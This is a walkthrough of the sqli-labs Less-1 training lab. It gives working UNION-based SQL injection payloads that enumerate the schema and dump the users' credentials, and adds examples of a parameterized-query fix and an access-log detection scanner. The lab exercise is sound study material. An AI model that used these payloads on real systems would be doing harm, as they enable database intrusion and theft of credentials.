sql-labs-less1: complete walkthrough of error-based UNION injection

sql-labs-less1 GET - Error based - Single quotes - String

step0 Setup

http://localhost/sqli-labs/Less-1/

HackBar

MySQL

Apache

step1 Testing

First, we pretend we don't know the back-end code. The SQL query it builds is sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; (the id parameter is spliced straight into the query string).

payload:
http://localhost/sqli-labs/Less-1/?id=1 --+

mysql:
SELECT * FROM users WHERE id='1' LIMIT 0,1

result:
Your Login name:Dumb
Your Password:Dumb

payload:
http://localhost/sqli-labs/Less-1/?id=1' --+

result:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

payload:
http://localhost/sqli-labs/Less-1/?id=1' and 1=1 --+

result:
Your Login name:Dumb
Your Password:Dumb

payload:
http://localhost/sqli-labs/Less-1/?id=1' and 1=2 --+

result:
none!

Conclusion: the site is therefore likely vulnerable to SQL injection. Next, use ORDER BY 1-99 to determine the number of columns in the table.

payload:
http://localhost/sqli-labs/Less-1/?id=1' order by 2 --+

result:
Your Login name:Dumb
Your Password:Dumb

payload:
http://localhost/sqli-labs/Less-1/?id=1' order by 3 --+

result:
Your Login name:Dumb
Your Password:Dumb

payload:
http://localhost/sqli-labs/Less-1/?id=1' order by 4 --+

result:
Unknown column '4' in 'order clause'

Conclusion: the column count is therefore 3.

payload:
http://localhost/sqli-labs/Less-1/?id=1' union select 1,2,3--+

result:
Your Login name:Dumb
Your Password:Dumb

The query executes successfully here, but the result of the union select is not shown, because the code outputs only the first row, so the rows fetched by the union select never reach the page. Setting id=-1 makes the original SELECT match nothing, so the union's row becomes the first result and is displayed.

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,3--+

result:
Your Login name:2
Your Password:3

The returned values are 2 and 3, meaning that positions 2 and 3 of union select 1,2,3 are echoed to the page and can hold MySQL expressions; so we try querying the current database name (the database() function) in position 3.

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,database()--+

result:
Your Login name:2
Your Password:security

Database name: security
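The behaviour observed in step 1 reproduced in code, as an added example that is not part of the original post or of sqli-labs: a constructed in-memory SQLite table standing in for security.users, a lookup that splices id into the query text exactly as the lab's SQL statement does, and the parameterized lookup that removes the flaw. The function names, the sample rows and the use of SQLite are assumptions of this example (the lab runs MySQL; the MySQL comment "--+" is passed here in the decoded form "-- " the server receives, and MySQL-only functions such as database() are not used).

```python
import sqlite3

# Constructed in-memory stand-in for the lab's security.users table. The column
# layout (id, username, password) is the one the walkthrough enumerates; the
# three rows are taken from the dump on the page.
SAMPLE_USERS = [
    (1, "Dumb", "Dumb"),
    (2, "Angelina", "I-kill-you"),
    (3, "Dummy", "p@ssword"),
]


def make_db():
    """Create the sample database (SQLite is used so the example runs offline;
    the lab itself is MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_id):
    """Mirror of the lab's statement: the id value is spliced into the SQL
    text, so a quote in it ends the string literal and the rest of the value
    is parsed as SQL."""
    sql = f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1"
    return conn.execute(sql).fetchone()


def lookup_parameterized(conn, user_id):
    """Hardened form: the value is bound as a parameter and compared as data;
    it is never parsed as SQL, whatever characters it contains."""
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchone()


def render(row):
    """Format a row the way the lab page does: column 2 is shown as the login
    name and column 3 as the password."""
    if row is None:
        return None
    return {"login": str(row[1]), "password": str(row[2])}


if __name__ == "__main__":
    conn = make_db()
    # Decoded forms of the step-1 payloads ('--+' arrives at the server as '-- ').
    probes = ["1", "1' and 1=1 -- ", "1' and 1=2 -- ", "-1' union select 1,2,3-- "]
    for value in probes:
        print(f"{value!r:32} vulnerable={render(lookup_vulnerable(conn, value))}"
              f" parameterized={render(lookup_parameterized(conn, value))}")
```

With the spliced query, id=1 with a tautology still returns Dumb, id=1 with a false condition returns nothing, and id=-1 with the union returns the constants 2 and 3 in the echoed columns, exactly as the page shows. With the bound parameter the same strings are compared against the id column as plain text and match no row. In a real application the integer id should additionally be validated before use, and database errors should be logged rather than echoed, since the echoed MySQL error in step 1 is what makes this an error-based lab.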

step2 Injection

Next, retrieve the table names.

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select table_name from information_schema.tables where table_schema='security' limit 0,1) --+

result:
Your Login name:2
Your Password:emails

The limit 0,1 can be changed here; replacing it with the group_concat function returns all table names at once.

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+

result:
Your Login name:2
Your Password:emails,referers,uagents,users

Taking users as the example, the next step is to get the column names.

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1) --+

result:
Your Login name:2
Your Password:id

The limit 0,1 can be changed here; replacing it with the group_concat function returns all column names at once.

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' ) --+

result:
Your Login name:2
Your Password:id,username,password

Finally, dump the usernames and passwords.

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select group_concat(concat(username,':',password)) from security.users ) --+

result:
Your Login name:2
Your Password:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4
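From the defender's side, the requests above leave a clear trail in the web server's access log. The following is an added example, not from the original post or from sqli-labs: constructed Apache combined-format log lines replaying the step-1 and step-2 requests, and a scanner that URL-decodes each query parameter and flags the indicators that appear in this walkthrough (union select, order by probes, information_schema, group_concat, database(), SQL comments, and and/or tautologies). The log lines, indicator names and regular expressions are assumptions of this example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache "combined" access log lines (not taken from the page)
# replaying the kind of requests the walkthrough sends to /sqli-labs/Less-1/.
SAMPLE_LOG = """\
127.0.0.1 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
127.0.0.1 - - [01/Jan/2024:10:00:05 +0000] "GET /sqli-labs/Less-1/?id=1%27+and+1%3D2+--+ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
127.0.0.1 - - [01/Jan/2024:10:00:09 +0000] "GET /sqli-labs/Less-1/?id=1%27+order+by+4+--+ HTTP/1.1" 200 600 "-" "Mozilla/5.0"
127.0.0.1 - - [01/Jan/2024:10:00:14 +0000] "GET /sqli-labs/Less-1/?id=-1%27+union+select+1,2,database()--+ HTTP/1.1" 200 700 "-" "Mozilla/5.0"
127.0.0.1 - - [01/Jan/2024:10:00:20 +0000] "GET /sqli-labs/Less-1/?id=-1%27+union+select+1,2,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema%3D%27security%27)+--+ HTTP/1.1" 200 900 "-" "Mozilla/5.0"
127.0.0.1 - - [01/Jan/2024:10:00:25 +0000] "GET /sqli-labs/Less-1/?id=2 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Request line inside the quoted part of a combined-format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Indicators derived from the payloads shown in the walkthrough. Each is
# matched against the decoded, whitespace-collapsed, lower-cased value.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\b"),
    "information_schema": re.compile(r"\binformation_schema\."),
    "group_concat": re.compile(r"\bgroup_concat\s*\("),
    "database_fn": re.compile(r"\bdatabase\s*\("),
    "sql_comment": re.compile(r"--|#|/\*"),
    "tautology": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+\b"),
}


def normalize(value):
    """Collapse whitespace and lower-case so spacing/case variants of the same
    payload are compared in one form (parse_qsl has already URL-decoded it,
    turning '+' into spaces, so '--+' becomes '-- ')."""
    return " ".join(value.split()).lower()


def classify_value(value):
    """Return the sorted indicator names that fire on one parameter value."""
    norm = normalize(value)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(norm))


def scan_log(text):
    """Scan access-log text and report every parameter that triggers an
    indicator, with its line number and parameter name."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            tags = classify_value(value)
            if tags:
                hits.append({"line": lineno, "param": name, "indicators": tags})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['param']} -> {', '.join(hit['indicators'])}")
```

Keyword matching of this kind is a triage signal for log review, not a control: it is easy to evade with other encodings or syntax, and the fix remains a parameterized query. On real logs, correlate hits by client address and look for the ramp-up pattern the walkthrough itself shows, a sequence of order by probes followed by union select queries against information_schema.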

step3 Conclusion

The results are as follows:

Dumb Dumb
Angelina I-kill-you
Dummy p@ssword
secure crappy
stupid stupidity
superman genious
batman mob!le
admin admin
admin1 admin1
admin2 admin2
admin3 admin3
dhakkan dumbo
admin4 admin4
